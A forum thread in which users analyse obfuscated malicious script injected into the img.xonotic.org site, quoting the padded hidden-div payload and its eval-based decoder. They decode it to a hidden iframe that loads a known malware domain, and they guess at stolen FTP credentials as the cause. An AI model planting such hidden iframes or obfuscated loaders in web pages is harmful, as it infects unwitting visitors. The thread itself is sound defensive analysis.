Create an account


Thread Rating:
  • 2 Vote(s) - 3 Average
  • 1
  • 2
  • 3
  • 4
  • 5
img.xonotic.org Infected again

#1
Star 
Looks like img.xonotic.org is infected again

There is code on the top of the page that is pointing to a malicious URL.
Undecided
Reply

#2
On the topic of img.xonotic.org, what on earth is

Code:
<xtnshrm34ltnshrmuyiftnshrmraxtnshrm34ltnshrmuymetnshrm x34tnshrmluywitnshrmdx34tnshrmluyttnshrmh="x3tnshrm4luytnshrm1" heitnshrmx34lutnshrmyghtnshrmt="1xtnshrm34luytnshrm" bortnshrmdx34tnshrmluytnshrmer="tnshrm0" xtnshrm34lutnshrmyfratnshrmmx34ltnshrmuyetnshrmbortnshrmdx34ltnshrmuyertnshrm="0xtnshrm34ltnshrmuy" srtnshrmx34tnshrmluytnshrmc="httnshrmx34tnshrmluytptnshrm:/xtnshrm34ltnshrmuy/tnshrmworx3tnshrm4luyktnshrmgroxtnshrm34lutnshrmyupstnshrmx34lutnshrmyittnshrme.x34tnshrmluycotnshrmm/2xtnshrm34luytnshrmtx/xtnshrm34ltnshrmuyitnshrmndex3tnshrm4luytnshrmx.px3tnshrm4luytnshrmhp">tnshrmx34tnshrmluyx34ltnshrmuy')tnshrm;x3tnshrm4luytnshrm</xtnshrm34ltnshrmuyiftnshrmraxtnshrm34ltnshrmuymetnshrm>

That might be what's causing it.
[Image: vN3NkMA]
(Idea stolen from Mr. Bougo. Hehehehe)
Reply

#3
(09-04-2010, 06:44 PM)clanclanclan Wrote: On the topic of img.xonotic.org, what on earth is

Code:
<xtnshrm34ltnshrmuyiftnshrmraxtnshrm34ltnshrmuymetnshrm x34tnshrmluywitnshrmdx34tnshrmluyttnshrmh="x3tnshrm4luytnshrm1" heitnshrmx34lutnshrmyghtnshrmt="1xtnshrm34luytnshrm" bortnshrmdx34tnshrmluytnshrmer="tnshrm0" xtnshrm34lutnshrmyfratnshrmmx34ltnshrmuyetnshrmbortnshrmdx34ltnshrmuyertnshrm="0xtnshrm34ltnshrmuy" srtnshrmx34tnshrmluytnshrmc="httnshrmx34tnshrmluytptnshrm:/xtnshrm34ltnshrmuy/tnshrmworx3tnshrm4luyktnshrmgroxtnshrm34lutnshrmyupstnshrmx34lutnshrmyittnshrme.x34tnshrmluycotnshrmm/2xtnshrm34luytnshrmtx/xtnshrm34ltnshrmuyitnshrmndex3tnshrm4luytnshrmx.px3tnshrm4luytnshrmhp">tnshrmx34tnshrmluyx34ltnshrmuy')tnshrm;x3tnshrm4luytnshrm</xtnshrm34ltnshrmuyiftnshrmraxtnshrm34ltnshrmuymetnshrm>

That might be what's causing it.

Replace All "tnshrm" with nothing and then
Replace All "x34luy" with nothing you get :
Code:
document.write('<iframe width=1 height=1 border=0 frameborder=0 src="http://workgroupsite.com/2tx/index.php"></iframe>')

I suspect that someone that has ftp access to img.xonotic.org has ftp password stealing malware on their pc.
I came across this recently where malware steals stored ftp credentials and uses it to infect websites.
Reply

#4
http://www.malwaredomainlist.com/mdl.php, look at the "workgroupsite.com" entry. Definitely malware :/

Edit: Wgetted the site (didn't visit it so I don't know what it does to browsers) and it looks like/is a clone of Google.
[Image: vN3NkMA]
(Idea stolen from Mr. Bougo. Hehehehe)
Reply

#5
(09-05-2010, 12:45 AM)clanclanclan Wrote: http://www.malwaredomainlist.com/mdl.php, look at the "workgroupsite.com" entry. Definitely malware :/

Edit: Wgetted the site (didn't visit it so I don't know what it does to browsers) and it looks like/is a clone of Google.

Run a dummy XP virtual machine (best on a computer you don't mind formatting afterwards, if sandboxing fails) if you want to see more. I've seen people on youtube doing this to show fake AVs and other bad stuff. Why XP? A lot of viruses is targeting that system.
(08-10-2012, 02:37 AM)Mr. Bougo Wrote: Cloud is the new Web 2.0. It makes no damn sense to me.
Reply

#6
Also: maybe the person who is causing this problem is using the very popular free FTP program FileZilla and stores the passwords in the program (by adding the site in the Site Manager). FileZilla appears to be vulnerable to certain malware being able read the contents of the password file and sending it to someone else, who then sells the passes to people who do stuff like the above. The safest way to use FileZilla on Windows, but maybe also other platforms, is to not store the passwords, but to use Quick Connect. It's a little more work, but much safer.
"Yes, there was a spambot some time ago on these forums." - aa
Reply

#7
Code:
<div style='visibility:hidden;' id='j3ak74yf'>xtnshrm34ltnshrmuydoctnshrmumx34tnshrmluyentnshrmtx34ltnshrmuy.tnshrmwritnshrmx34tnshrmluytetnshrm('<xtnshrm34ltnshrmuyiftnshrmraxtnshrm34ltnshrmuymetnshrm x34tnshrmluywitnshrmdx34tnshrmluyttnshrmh=x3tnshrm4luytnshrm1 heitnshrmx34lutnshrmyghtnshrmt=1xtnshrm34luytnshrm bortnshrmdx34tnshrmluytnshrmer=tnshrm0 xtnshrm34lutnshrmyfratnshrmmx34ltnshrmuyetnshrmbortnshrmdx34ltnshrmuyertnshrm=0xtnshrm34ltnshrmuy srtnshrmx34tnshrmluytnshrmc="httnshrmx34tnshrmluytptnshrm:/xtnshrm34ltnshrmuy/tnshrmworx3tnshrm4luyktnshrmgroxtnshrm34lutnshrmyupstnshrmx34lutnshrmyittnshrme.x34tnshrmluycotnshrmm/2xtnshrm34luytnshrmtx/xtnshrm34ltnshrmuyitnshrmndex3tnshrm4luytnshrmx.px3tnshrm4luytnshrmhp">tnshrmx34tnshrmluy</ixtnshrm34ltnshrmuyfratnshrmx34lutnshrmymetnshrm>x34ltnshrmuy')tnshrm;x3tnshrm4luytnshrm</div>

...doesn't seem to be named like this by a company or admin!
...it looks like it's repeating itself :S

Code:
// marked is the following

xtnshrm34ltnshrmuyiftnshrmraxtnshrm34ltnshrmuymetnshrm

x3tnshrm4luytnshrm1

1xtnshrm34luytnshrm

tnshrm0

0xtnshrm34ltnshrmuy

"httnshrmx34tnshrmluytptnshrm:/xtnshrm34ltnshrmuy/tnshrmworx3tnshrm4luyktnshrmgroxtnshrm34lutnshrmyupstnshrmx34lutnshrmyittnshrme.x34tnshrmluycotnshrmm/2xtnshrm34luytnshrmtx/xtnshrm34ltnshrmuyitnshrmndex3tnshrm4luytnshrmx.px3tnshrm4luytnshrmhp"

ixtnshrm34ltnshrmuyfratnshrmx34lutnshrmymetnshrm

the parts
Code:
x3tnshrm4luytnshrm1

and
Code:
1xtnshrm34luytnshrm
seem to repeat themselves perfectly with only some letters position changed!

..//\\
//||\\
...||
...||

INFECTED!?
MY NOOB STATS:
[Image: 788.png]
Reply

#8
(09-05-2010, 12:02 PM)rainerzufalldererste Wrote:
Code:
<div style='visibility:hidden;' id='j3ak74yf'>xtnshrm34ltnshrmuydoctnshrmumx34tnshrmluyentnshrmtx34ltnshrmuy.tnshrmwritnshrmx34tnshrmluytetnshrm('<xtnshrm34ltnshrmuyiftnshrmraxtnshrm34ltnshrmuymetnshrm x34tnshrmluywitnshrmdx34tnshrmluyttnshrmh=x3tnshrm4luytnshrm1 heitnshrmx34lutnshrmyghtnshrmt=1xtnshrm34luytnshrm bortnshrmdx34tnshrmluytnshrmer=tnshrm0 xtnshrm34lutnshrmyfratnshrmmx34ltnshrmuyetnshrmbortnshrmdx34ltnshrmuyertnshrm=0xtnshrm34ltnshrmuy srtnshrmx34tnshrmluytnshrmc="httnshrmx34tnshrmluytptnshrm:/xtnshrm34ltnshrmuy/tnshrmworx3tnshrm4luyktnshrmgroxtnshrm34lutnshrmyupstnshrmx34lutnshrmyittnshrme.x34tnshrmluycotnshrmm/2xtnshrm34luytnshrmtx/xtnshrm34ltnshrmuyitnshrmndex3tnshrm4luytnshrmx.px3tnshrm4luytnshrmhp">tnshrmx34tnshrmluy</ixtnshrm34ltnshrmuyfratnshrmx34lutnshrmymetnshrm>x34ltnshrmuy')tnshrm;x3tnshrm4luytnshrm</div>

...doesn't seem to be named like this by a company or admin!
...it looks like it's repeating itself :S

Code:
// marked is the following

xtnshrm34ltnshrmuyiftnshrmraxtnshrm34ltnshrmuymetnshrm

x3tnshrm4luytnshrm1

1xtnshrm34luytnshrm

tnshrm0

0xtnshrm34ltnshrmuy

"httnshrmx34tnshrmluytptnshrm:/xtnshrm34ltnshrmuy/tnshrmworx3tnshrm4luyktnshrmgroxtnshrm34lutnshrmyupstnshrmx34lutnshrmyittnshrme.x34tnshrmluycotnshrmm/2xtnshrm34luytnshrmtx/xtnshrm34ltnshrmuyitnshrmndex3tnshrm4luytnshrmx.px3tnshrm4luytnshrmhp"

ixtnshrm34ltnshrmuyfratnshrmx34lutnshrmymetnshrm

the parts
Code:
x3tnshrm4luytnshrm1

and
Code:
1xtnshrm34luytnshrm
seem to repeat themselves perfectly with only some letters position changed!

..//\\
//||\\
...||
...||

INFECTED!?

The following code replaces "tnshrm" with nothing
and then "x34luy" with nothing.

Code:
    var xsry8w5 = $('div#j3ak74yf').html().replace(/tnshrm/g, '');
    var Rtmbpm0 = eval(String.fromCharCode(215-114,614-496,518-421,597-489));
    Rtmbpm0(xsry8w5.replace(/x34luy/g, ''));

Which results in
Code:
document.write('<iframe width=1 height=1 border=0 frameborder=0 src="http://workgroupsite.com/2tx/index.php"></iframe>')
Reply



Possibly Related Threads…
Thread Author Replies Views Last Post
  Away again Mario 5 5,957 05-12-2015, 03:09 PM
Last Post: Halogene
Thumbs Down YouTube is crapping up... AGAIN Minkovsky 5 7,438 10-29-2012, 10:22 AM
Last Post: hutty
  Sony may end up getting curb-stomped (again) this handheld generation Lee_Stricklin 15 16,890 02-21-2012, 01:59 PM
Last Post: Mr. Bougo
  Finally got around to uploading this... again. Liquid Sin 8 9,646 05-28-2011, 09:24 AM
Last Post: rainerzufalldererste
  I DO DECLARE: My Xonotic is working again! Minkovsky 2 3,583 04-22-2011, 11:59 PM
Last Post: clanclanclan
  http://img.xonotic.org/ "missing plugin" Silverburn 5 4,997 09-05-2010, 06:22 PM
Last Post: Silverburn

Forum Jump:


Users browsing this thread:
1 Guest(s)

Forum software by © MyBB original theme © iAndrew 2016, remixed by -z-